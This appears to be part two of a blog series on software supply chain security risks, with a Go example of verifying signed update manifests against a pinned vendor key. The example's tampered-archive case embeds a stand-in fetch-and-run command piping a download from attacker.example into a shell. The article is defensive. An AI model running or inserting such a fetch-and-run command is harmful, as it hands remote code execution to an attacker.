Software Supply Chain Security Risks, Part 2
In part one of our series on software supply chain security risk, we examined six of the top software supply chain risks, but unfortunately, there are others.
Code is where modern software development begins, and the supply chain makes up everything that touches that code during the software development lifecycle–from infrastructure to hardware to operating systems to cloud services. In other words, software supply chains are the lifeblood of most organizations.
But as the term suggests, the software supply chain is made up of many parts from many sources, and each of them can introduce risk. Here is a look at six more risks to consider when assessing your software supply chain security posture.
Risk: Unknown or Zero-Day Vulnerabilities
Coding errors can leave applications open to attacks such as remote code execution and denial of service. When such a flaw is unknown to the vendor and to defenders, and possibly already known to attackers, it is called a zero-day vulnerability. The ‘zero’ refers to the number of days the vendor has had to fix it: software that is already deployed is exposed, and there is no patch to apply.
To catch these flaws before attackers do, each component and application must be tested. Static application security testing (SAST) of your own code, software composition analysis (SCA) of the third-party dependencies you pull in, vulnerability scanning, and dynamic application security testing (DAST) of the running application together identify a good majority of them. But because these tools can generate thousands of findings, organizations need analysts with the expertise to triage them, separate true positives from noise, and prioritize the ones that matter most: flaws that are reachable and exploitable in exposed code.
A robust, continuously updated (dynamic) SBOM also gives teams an inventory of every software component used throughout the SDLC and keeps it current as components change, so that when a vulnerability in a component is disclosed you can immediately tell where it is deployed and what needs patching. Patch all systems regularly and keep them up to date.
Risk: Hijacked Software Updates
Software updates and upgrades are downloaded periodically on the assumption that they come from a trusted developer. But as the SolarWinds compromise discovered in December 2020 showed, a legitimately signed update can itself be the delivery vehicle for malware: attackers compromised SolarWinds’ build process and inserted the SUNBURST backdoor into Orion updates, which were then distributed through the vendor’s normal update channel to thousands of customers.
This doesn’t mean you should stop applying software updates; unpatched software is the far more common problem. It means you should treat the update channel as part of your attack surface: vet the vendors whose tools and apps play a part in your software supply chain, ask how they secure their build pipelines, and verify the signatures and checksums of what you download against keys and digests obtained out of band rather than from the same place as the download.
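The verification step described above, written out as an added example in Go (this is illustrative code, not SolarWinds’ or any vendor’s update mechanism). The vendor publishes a small manifest containing the version and SHA-256 digest of the update archive and signs it with an Ed25519 release key; the consumer holds a copy of the vendor’s public key that it obtained out of band and pinned in its own configuration, verifies the manifest signature, and only then checks the downloaded archive against the signed digest. The keys, archive bytes, and manifest format are all constructed for the example. The `main` function walks through the genuine update, an archive swapped in transit, and an attacker re-signing a manifest with their own key:

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is what the vendor publishes next to an update archive: the
// version and the hex-encoded SHA-256 digest of the archive. The vendor signs
// the canonical encoding of this struct with its release key. (Format is an
// assumption made for this example.)
type Manifest struct {
	Version string
	SHA256  string
}

// canonical returns the exact bytes that are signed and verified. Any change
// to the version or digest changes these bytes and invalidates the signature.
func (m Manifest) canonical() []byte {
	return []byte("version=" + m.Version + "\nsha256=" + m.SHA256 + "\n")
}

// SignManifest is the vendor side: hash the artifact, fill in the manifest,
// sign it. It is included so the example runs offline; in practice this
// happens in the vendor's release pipeline, not on the consumer.
func SignManifest(priv ed25519.PrivateKey, version string, artifact []byte) (Manifest, []byte) {
	sum := sha256.Sum256(artifact)
	m := Manifest{Version: version, SHA256: hex.EncodeToString(sum[:])}
	return m, ed25519.Sign(priv, m.canonical())
}

var (
	ErrBadSignature   = errors.New("manifest signature invalid: not signed by the pinned vendor key")
	ErrDigestMismatch = errors.New("artifact digest does not match the signed manifest")
)

// VerifyUpdate is the consumer side. pinnedKey is the vendor public key stored
// in your configuration, NOT a key fetched from the download location. The
// signature is checked first so that an unsigned or re-signed manifest is
// rejected before its digest is trusted for anything.
func VerifyUpdate(pinnedKey ed25519.PublicKey, m Manifest, sig, artifact []byte) error {
	if !ed25519.Verify(pinnedKey, m.canonical(), sig) {
		return ErrBadSignature
	}
	sum := sha256.Sum256(artifact)
	// The digest is public data, so a plain comparison is fine here.
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return ErrDigestMismatch
	}
	return nil
}

func main() {
	// Constructed keys and archive contents for the demonstration.
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	artifact := []byte("agent-2.4.1.tar.gz contents (constructed)")
	m, sig := SignManifest(vendorPriv, "2.4.1", artifact)

	// Case 0: genuine update, vendor manifest, vendor signature.
	fmt.Println("genuine:          ", VerifyUpdate(vendorPub, m, sig, artifact))

	// Case 1: a mirror or man-in-the-middle swapped the archive but left the
	// vendor's signed manifest alone. The signature is fine, the digest is not.
	tampered := append(append([]byte{}, artifact...), []byte("\n;curl attacker.example|sh")...)
	fmt.Println("tampered archive: ", VerifyUpdate(vendorPub, m, sig, tampered))

	// Case 2: the attacker re-signs a matching manifest for the tampered
	// archive with their own key. The digest matches, the signature does not.
	m2, sig2 := SignManifest(attackerPriv, "2.4.1", tampered)
	fmt.Println("attacker-signed:  ", VerifyUpdate(vendorPub, m2, sig2, tampered))
}
```

Note what this does and does not catch. It stops substitution of the archive in transit, on a mirror, or on a compromised download server, and it stops anyone without the vendor’s private key from publishing an update in the vendor’s name. It does not stop the SolarWinds case, where the malicious code was inserted before signing and the update carried a valid vendor signature; defending against that requires the vendor to secure its build pipeline (and, where possible, build provenance you can check independently), which is why vendor vetting remains part of the answer.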
Risk: Supplier Fraud
Another risk is when cybercriminals impersonate a known vendor and request a change to their payment details, such as a new bank account for invoices. These threat actors can be hard to identify because they typically use sophisticated social engineering techniques, including phishing, AI-generated voicemails, and deepfake video recordings.
Equally troubling is that legitimate third-party vendors can themselves fall victim to these tactics, and a compromised vendor account or mailbox then becomes a trusted-looking channel for fraudulent requests and data exposure that reach your organization. This generally happens when there are no strong security and verification policies in place, such as confirming any change to payment details through a contact obtained independently of the request.
Risk: Poor Communication Among Supply Chain Partners
All the players in the supply chain, including procurement and enterprise risk management teams, must communicate and coordinate their efforts effectively. Often, this does not happen. Technology such as risk analytics can help identify potential supply chain failure points, but technology alone cannot avert risk. Third parties need to work together to assess risk and put risk management controls in place so that organizations can avoid costly disruptions.
Risk: Increased Access to Supply Chain Resources
The more cloud resources, developer tools, and repositories are used during the SDLC, the more places a compromised credential or account can reach, and the more serious an incident becomes. Access to these resources should be tightly controlled. This is where organizations benefit from applying least privilege throughout the supply chain, so that each person, service account, and CI job has only the minimum access required for its task; a build job that needs to read one repository, for example, should not hold an organization-wide write token.
Risk: A Lack of Endpoint Security
Connected endpoints are also a key part of the software supply chain that can introduce risk, especially as remote work has grown and the number of devices connected to corporate networks keeps increasing. Common approaches such as virtual private networks and virtual desktops are not adequate on their own to protect organizations and mitigate threats.
Organizations should implement endpoint monitoring with full disclosure to their employees. They should also harden all connected devices and protect the sensitive data on them to reduce the attack surface.
Security teams can also proactively deploy tools such as encryption, data loss prevention (DLP), endpoint detection and response (EDR), and antivirus scanners. And of course, they should conduct regular security training for all employees.